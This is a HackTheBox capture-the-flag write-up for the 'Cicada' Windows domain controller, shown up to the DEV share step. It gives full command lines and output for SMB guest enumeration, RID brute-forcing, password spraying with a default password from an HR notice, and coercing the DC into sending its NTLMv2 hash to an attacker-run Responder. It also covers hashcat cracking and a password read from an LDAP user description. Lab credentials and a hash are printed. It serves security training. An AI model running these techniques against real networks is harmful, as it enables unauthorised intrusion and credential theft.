[HackTheBox] Cicada
jamarir18 min read
Table of contents
Just another User-Description Leakage / SeBackupPrivilege Write-up.
Footprinting
Open ports
The Nmap scan show it’s a Windows machine (SMB:445, RPC:135/593, WinRM:5985), but more particularly a DC (LDAP:389/636, DNS:53, NTP:123, and especially Kerberos:88):
jamarir@kali:~$ sudo nmap -sS -p- -v -Pn --disable-arp-ping -oA syn_full --open 10.10.11.35;
jamarir@kali:~$ nmap -Pn --disable-arp-ping -sC -sV -v -oA nse 10.10.11.35 -p$(grep -oP '^\d*(?=/)(?=.* open )' syn_full.nmap |tr '\n' ',' |grep -oP '.*(?=,)')
[...]
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: <DATE>)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
57534/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-10-22T18:57:25
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m59s
jamarir@kali:~$ sudo nmap -v -Pn --disable-arp-ping -sU --top-ports 100 -oA udp_top100 --open 10.10.11.35
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
Let's add this domain name server in our local DNS settings:
jamarir@kali:~$ sudo sed -i '1i nameserver 10.10.11.35' /etc/resolv.conf
And get its FQDN (CICADA-DC.cicada.htb):
jamarir@kali:~$ nxc smb 10.10.11.35
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
Local Privilege Escalation
User
Rabbit holations
LDAP’s null session ?
The Guest account, using the credentials a:, is allowed to access the SMB protocol:
jamarir@kali:~$ for proto in ssh smb rdp vnc winrm ldap mssql wmi ftp; do (nxc $proto 10.10.11.35 -u 'a' -p '' &); done
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)
LDAP 10.10.11.35 389 CICADA-DC [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090C78, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\a:
Note that even if the
a:credentials are allowed for LDAP, we can't use these to perform an arbitrary LDAP query, at least for most of them. The onlynxc‘s LDAP module giving an output isldap-checker:jamarir@kali:~$ nxc ldap 10.10.11.35 -u 'a' -p '' -M ldap-checker SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) LDAP 10.10.11.35 389 CICADA-DC [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090C78, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\a: LDAP-CHE... 10.10.11.35 389 CICADA-DC LDAP Signing NOT Enforced! LDAP-CHE... 10.10.11.35 389 CICADA-DC LDAPS Channel Binding is set to "NEVER"
This Guest account on SMB has access to an uncommon HR share:
jamarir@kali:~$ nxc smb 10.10.11.35 -u 'a' -p '' -d cicada.htb --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share
Which contains a Notice from Human Resources:
jamarir@kali:~$ smbclient.py 'cicada.htb/a:@10.10.11.35'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# use HR
l# ls
drw-rw-rw- 0 Fri Mar 15 07:26:17 2024 .
drw-rw-rw- 0 Thu Mar 14 13:21:29 2024 ..
-rw-rw-rw- 1266 Wed Aug 28 19:31:48 2024 Notice from HR.txt
Am I finally f/hired ?!
We may use smbget to download that file locally:
jamarir@kali:~$ smbget 'smb://10.10.11.35/HR/Notice From HR.txt' -U 'a%' --workgroup=cicada.htb
Using domain: CICADA.HTB, user: a
smb://10.10.11.35/HR/Notice From HR.txt
Downloaded 1.24kB in 0 seconds
jamarir@kali:~$ cat Notice\ From\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
Basically:
The firm is named
Cicada Corp.The support team's mail is
support@cicada.htb.The password for new employees is set to
Cicada$M6Corpb*@Lp#nZp!8by default.
So, let's try the support username ?
jamarir@kali:~$ nxc smb 10.10.11.35 -u 'support' -p 'Cicada$M6Corpb*@Lp#nZp!8' -d cicada.htb --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\support:Cicada$M6Corpb*@Lp#nZp!8 (Guest)
SMB 10.10.11.35 445 CICADA-DC [-] Error enumerating shares: STATUS_ACCESS_DENIED
Well, nxc reverted to the Guest account, which means that this support user doesn't exist in the domain.
“[W]e can see that Netexec authenticates twice when running the [
nxc smb --shares] command. The second authentication is the authentication of thesomeaccountthatdoesntexistaccount which doesn’t exist within the Active Directory domain. Even if the user doesn’t exist we authenticate and connect to thesvcctlnamed pipe which is used by Netexec to determine whether or not the account is local admin. But the account doesn’t exist so what is the magic trick? [...] When we connected as a user that doesn’t exist, the server was aware of it so it implicitly falls back to the guest account of the domain.”
Then, we could use enum4linux to enumerate users in the domain:
Using the
Guestusername is important withenum4linux, as it doesn't automatically switch fromatoGuest.
jamarir@kali:~$ enum4linux -a -u 'Guest' -p '' 10.10.11.35 -w cicada.htb |tee enum4linux.txt
[...]
=================================( Getting domain SID for 10.10.11.35 )=================================
Domain Name: CICADA
Domain Sid: S-1-5-21-917908876-1423158569-3159038727
[+] Host is part of a domain (not a workgroup)
===================================( OS information on 10.10.11.35 )===================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.11.35 from srvinfo:
10.10.11.35 Wk Sv PDC Tim NT CICADA-DC
platform_id : 500
os version : 10.0
server type : 0x80102b
[...]
====================( Users on 10.10.11.35 via RID cycling (RIDS: 500-550,1000-1050) )===================
[I] Found new SID:
S-1-5-21-917908876-1423158569-3159038727
[...]
[I] Found new SID:
S-1-5-32
[...]
[+] Enumerating users using SID S-1-5-32 and logon username 'Guest', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[...]
[+] Enumerating users using SID S-1-5-21-917908876-1423158569-3159038727 and logon username 'Guest', password ''
S-1-5-21-917908876-1423158569-3159038727-500 CICADA\Administrator (Local User)
S-1-5-21-917908876-1423158569-3159038727-501 CICADA\Guest (Local User)
S-1-5-21-917908876-1423158569-3159038727-502 CICADA\krbtgt (Local User)
[...]
S-1-5-21-917908876-1423158569-3159038727-1000 CICADA\CICADA-DC$ (Local User)
[+] Enumerating users using SID S-1-5-21-47050115-2771739599-2321771406 and logon username 'Guest', password ''
S-1-5-21-47050115-2771739599-2321771406-500 CICADA-DC\Administrator (Local User)
S-1-5-21-47050115-2771739599-2321771406-501 CICADA-DC\Guest (Local User)
S-1-5-21-47050115-2771739599-2321771406-503 CICADA-DC\DefaultAccount (Local User)
S-1-5-21-47050115-2771739599-2321771406-504 CICADA-DC\WDAGUtilityAccount (Local User)
S-1-5-21-47050115-2771739599-2321771406-513 CICADA-DC\None (Domain Group)
[...]
We could also have used the nxc’s --rid-brute feature, which enumerates users and groups in the target (domain-wise):
jamarir@kali:~$ nxc smb 10.10.11.35 -u 'a' -p '' --rid-brute |tee -a rid_brute.txt
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\a: (Guest)
SMB 10.10.11.35 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
[...]
SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
[...]
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
The following Perl REGEX will give us the users from the rid_brute’s output:
jamarir@kali:~$ grep -oP '^.*?1\d{3}.*\\\K.*(?= \(SidTypeUser)' rid_brute.txt |tee users.txt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
Only RIDs equal or above 1000 are retrieved, as these correspond to non-builtin users or groups.
Sprayed mike
You guessed it, time to password spray !
jamarir@kali:~$ while read user; do for protocol in smb ldap winrm; do (nxc $protocol 10.10.11.35 -u "$user" -p 'Cicada$M6Corpb*@Lp#nZp!8' |grep -vP '( \[\*\] | STATUS_LOGON_FAILURE |RPC_S_ACCESS_DENIED| Connection refused | ERROR )'&); done; done < users.txt
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
We compromised cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 ! We are authenticated in LDAP and SMB.
Nothing is interesting in the SMB shares:
jamarir@kali:~$ nxc smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -d cicada.htb --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
For LDAP, let's retrieve the BloodHound collection:
jamarir@kali:~$ nxc ldap 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -d 'cicada.htb' --dns-server 10.10.11.35 --bloodhound --collection All
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
LDAP 10.10.11.35 389 CICADA-DC Resolved collection methods: session, objectprops, rdp, acl, psremote, container, dcom, localadmin, group, trusts
LDAP 10.10.11.35 389 CICADA-DC Done in 00M 03S
LDAP 10.10.11.35 389 CICADA-DC Compressing output into /home/jamarir/.nxc/logs/CICADA-DC_10.10.11.35_<DATE>_bloodhound.zip
Rabbit holations v2
WinRM ?
WinRM is listening on the target, so we might look for theRemote Management Users group’s members, allowed to get a remote shell through WinRM on our target :
jamarir@kali:~$ nxc ldap 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -d 'cicada.htb' --query "(&(memberOf=CN=Remote Management Users,CN=Builtin,DC=cicada,DC=htb))" "sAMAccountName"
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
LDAP 10.10.11.35 389 CICADA-DC [+] Response for object: CN=Emily Oscars,CN=Users,DC=cicada,DC=htb
LDAP 10.10.11.35 389 CICADA-DC distinguishedName: CN=Emily Oscars,CN=Users,DC=cicada,DC=htb
LDAP 10.10.11.35 389 CICADA-DC sAMAccountName: emily.oscars
Only Emily Oscar can use that service. But we haven't compromise his account yet :/
Let's check bloodhound data:
I've forgotten my bloodhound/neo4j password… But hopefully, we may disable that authentication, and optionnally expose the neo4j service locally, editing
neo4j.conf:
jamarir@kali:~$ sudo neo4j stop
jamarir@kali:~$ sudo vim /etc/neo4j/neo4j.conf
dbms.security.auth_enabled=false
server.default_listen_address=127.0.0.1
$ sudo neo4j start
Nothing really interesting from our Michael user when looking at the groups he’s a member of:
Weak passwords ?
Then we might try to:
- Enumerate, with our LDAP account, all the users and try a password spray again if we have new users. However, the users found in the LDAP query are the same as found above with the Guest account:
jamarir@kali:~$ nxc ldap 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -d 'cicada.htb' --query "(&(objectCategory=person)(objectClass=user))" "*" |tee all_users.txt
jamarir@kali:~$ grep 'sAMAccountName' all_users.txt
LDAP 10.10.11.35 389 CICADA-DC sAMAccountName: Administrator
LDAP 10.10.11.35 389 CICADA-DC sAMAccountName: Guest
LDAP 10.10.11.35 389 CICADA-DC sAMAccountName: krbtgt
LDAP 10.10.11.35 389 CICADA-DC sAMAccountName: john.smoulder
LDAP 10.10.11.35 389 CICADA-DC sAMAccountName: sarah.dantelia
LDAP 10.10.11.35 389 CICADA-DC sAMAccountName: michael.wrightson
LDAP 10.10.11.35 389 CICADA-DC sAMAccountName: david.orelious
LDAP 10.10.11.35 389 CICADA-DC sAMAccountName: emily.oscars
- Try the same username and password combinations with the found users, but that's unsuccessful, even locally:
jamarir@kali:~$ while read user; do for protocol in wmi winrm ldap smb; do (nxc $protocol 10.10.11.35 -u $user -p $user --no-bruteforce --continue-on-success |grep -vP '( \[\*\] | STATUS_LOGON_FAILURE |RPC_S_ACCESS_DENIED| Connection refused | ERROR )'&); done; done < users.txt
jamarir@kali:~$ while read user; do for protocol in wmi winrm ldap smb; do (nxc $protocol 10.10.11.35 -u $user -p $user --no-bruteforce --continue-on-success --local-auth |grep -vP '( \[\*\] | STATUS_LOGON_FAILURE |RPC_S_ACCESS_DENIED| Connection refused | ERROR )'&); done; done < users.txt
- Try a blank password for the found users, but that's unsuccessful:
jamarir@kali:~$ while read user; do (nxc smb ldap winrm wmi 10.10.11.35 -u $user -p '' --no-bruteforce --continue-on-success |grep -vP '( \[\*\] | STATUS_LOGON_FAILURE |RPC_S_ACCESS_DENIED| Connection refused | ERROR )'&); done < users.txt
Kerberoasting / ASREPRoasting ?
- Look for kerberoastable accounts (i.e. domain users with an SPN, which implies that we can ask, then crack, their TGS’s NTHash), but no entries are found...:
jamarir@kali:~$ GetUserSPNs.py -request -dc-ip 10.10.11.35 cicada.htb/'michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
No entries found!
- Look for ASREPRoastable accounts (i.e. accounts that are allowed to request a TGT without password), but no entries are found...:
jamarir@kali:~$ nxc ldap 10.10.11.35 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --asreproast ASREProastables.txt --kdcHost 10.10.11.35
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
LDAP 10.10.11.35 389 CICADA-DC [*] Total of records returned 3
LDAP 10.10.11.35 389 CICADA-DC No entries found!
Coerce Net-NTLMv2 u said ?!
After passing some time on the nxc scan for vulnerabilities, the following output sounded interesting:
jamarir@kali:~$ nxc smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M coerce_plus
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
COERCE_PLUS 10.10.11.35 445 CICADA-DC VULNERABLE, DFSCoerce
COERCE_PLUS 10.10.11.35 445 CICADA-DC VULNERABLE, PetitPotam
COERCE_PLUS 10.10.11.35 445 CICADA-DC VULNERABLE, PrinterBug
COERCE_PLUS 10.10.11.35 445 CICADA-DC VULNERABLE, MSEven
Thus, we may use Responder, along with Coercer to force/coerce the DC to authenticate to our local SMB server, and steal the Net-NTLMv2 hash:
>>>
$ python gits/Coercer/Coercer.py coerce -l 10.10.14.7 -t 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -d cicada.htb -v
______
/ ____/___ ___ _____________ _____
/ / / __ \/ _ \/ ___/ ___/ _ \/ ___/
/ /___/ /_/ / __/ / / /__/ __/ / v2.4.3
\____/\____/\___/_/ \___/\___/_/ by @podalirius_
[info] Starting coerce mode
[info] Scanning target 10.10.11.35
[*] DCERPC portmapper discovered ports: 49664,49665,58368,49667,49669,57542,57547,57549,57562,57534
[+] Coercing '10.10.11.35' to authenticate to '10.10.14.7'
[+] DCERPC port '57534' is accessible!
[+] Successful bind to interface (12345678-1234-ABCD-EF00-0123456789AB, 1.0)!
[!] (NO_AUTH_RECEIVED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotification(pszLocalMachine='\\10.10.14.7\x00')
Continue (C) | Skip this function (S) | Stop exploitation (X) ? c
[!] (NO_AUTH_RECEIVED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotification(pszLocalMachine='\\10.10.14.7@@80/pER\x00')
Continue (C) | Skip this function (S) | Stop exploitation (X) ? c
[!] (RPC_S_ACCESS_DENIED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotificationEx(pszLocalMachine='\\10.10.14.7\x00')
<<<
$ sudo responder -I tun0
[...]
[SMB] NTLMv2-SSP Client : 10.10.11.35
[SMB] NTLMv2-SSP Username : CICADA\CICADA-DC$
[SMB] NTLMv2-SSP Hash : CICADA-DC$::CICADA:1122334455667788:ED15C4FEDAE42B8B5A13DD61175573F9:010100000000000000036108CE24DB01D492435AB0EAA5990000000002000800540046004900510001001E00570049004E002D00350049004B004F003000590058005900530033004B0004003400570049004E002D00350049004B004F003000590058005900530033004B002E0054004600490051002E004C004F00430041004C000300140054004600490051002E004C004F00430041004C000500140054004600490051002E004C004F00430041004C000700080000036108CE24DB0106000400020000000800300030000000000000000000000000400000B1913CDA3F2211C8A5511A23B50FFD55F9D6BC97EA09F6F0000A8302D1E06E110A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0037000000000000000000
Alternatively, we could also use nxc with the LISTENER option (and responder in the background):
jamarir@kali:~$ sudo responder -I tun0
jamarir@kali:~$ nxc smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M coerce_plus -o LISTENER=10.10.14.7
The format of the Net-NTLMv2 hash is:
username::domain:ServerChallenge:NTproofstring:ntlmv2response
Basically, we might try to perform NTLM relay attacks (MITM-impersonate the victim’s computer) with this hash, or crack it. However, SMB signing is enabled (preventing NTLM relays), and the hash isn’t easily crackable.
jamarir@kali:~$ hashcat -m 5600 -a 0 ntlmv2.hash /usr/share/wordlists/rockyou.txt
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: CICADA-DC$::CICADA:1122334455667788:ed15c4fedae42b8...000000
Time.Started.....: <DATE> (28 secs)
Time.Estimated...: <DATE> (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 369.9 kH/s (0.92ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 89%
david.orelious’s description, it was that izi …
After a night of rabbit holing, I started navigating into the nxc's available modules, specifically the LDAP ones:
jamarir@kali:~$ nxc ldap 10.10.11.35 -L
LOW PRIVILEGE MODULES
[*] adcs Find PKI Enrollment Services in Active Directory and Certificate Templates Names
[*] daclread Read and backup the Discretionary Access Control List of objects. Be careful, this module cannot read the DACLS recursively, see more explanation in the options.
[*] enum_trusts Extract all Trust Relationships, Trusting Direction, and Trust Transitivity
[*] find-computer Finds computers in the domain via the provided text
[*] get-desc-users Get description of the users. May contained password
[*] get-network Query all DNS records with the corresponding IP from the domain.
[*] get-unixUserPassword Get unixUserPassword attribute from all users in ldap
[*] get-userPassword Get userPassword attribute from all users in ldap
[*] group-mem Retrieves all the members within a Group
[*] groupmembership Query the groups to which a user belongs.
[*] laps Retrieves all LAPS passwords which the account has read permissions for.
[*] ldap-checker Checks whether LDAP signing and binding are required and / or enforced
[*] maq Retrieves the MachineAccountQuota domain-level attribute
[*] obsolete Extract all obsolete operating systems from LDAP
[*] pre2k Identify pre-created computer accounts, save the results to a file, and obtain TGTs for each
[*] pso Module to get the Fine Grained Password Policy/PSOs
[*] sccm Find a SCCM infrastructure in the Active Directory
[*] subnets Retrieves the different Sites and Subnets of an Active Directory
[*] user-desc Get user descriptions stored in Active Directory
[*] whoami Get details of provided user
Among these, the get-desc-users was definitely interesting !
jamarir@kali:~$ nxc ldap 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M get-desc-users
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
GET-DESC... 10.10.11.35 389 CICADA-DC [+] Found following users:
GET-DESC... 10.10.11.35 389 CICADA-DC User: Administrator description: Built-in account for administering the computer/domain
GET-DESC... 10.10.11.35 389 CICADA-DC User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.10.11.35 389 CICADA-DC User: krbtgt description: Key Distribution Center Service Account
GET-DESC... 10.10.11.35 389 CICADA-DC User: david.orelious description: Just in case I forget my password is aRt$Lp#7t*VQ!3
And actually, I should have looked closed at my previous all_users.txt file above...
jamarir@kali:~$ grep 'description' all_users.txt
LDAP 10.10.11.35 389 CICADA-DC description: Built-in account for administering the computer/domain
LDAP 10.10.11.35 389 CICADA-DC description: Built-in account for guest access to the computer/domain
LDAP 10.10.11.35 389 CICADA-DC description: Key Distribution Center Service Account
LDAP 10.10.11.35 389 CICADA-DC description: Just in case I forget my password is aRt$Lp#7t*VQ!3
Anyway, we can impersonate cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 !
emily.oscars can read a backup u said ?!
david.orelious has access to the DEV share:
jamarir@kali:~$ nxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -d cicada.htb --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV READ
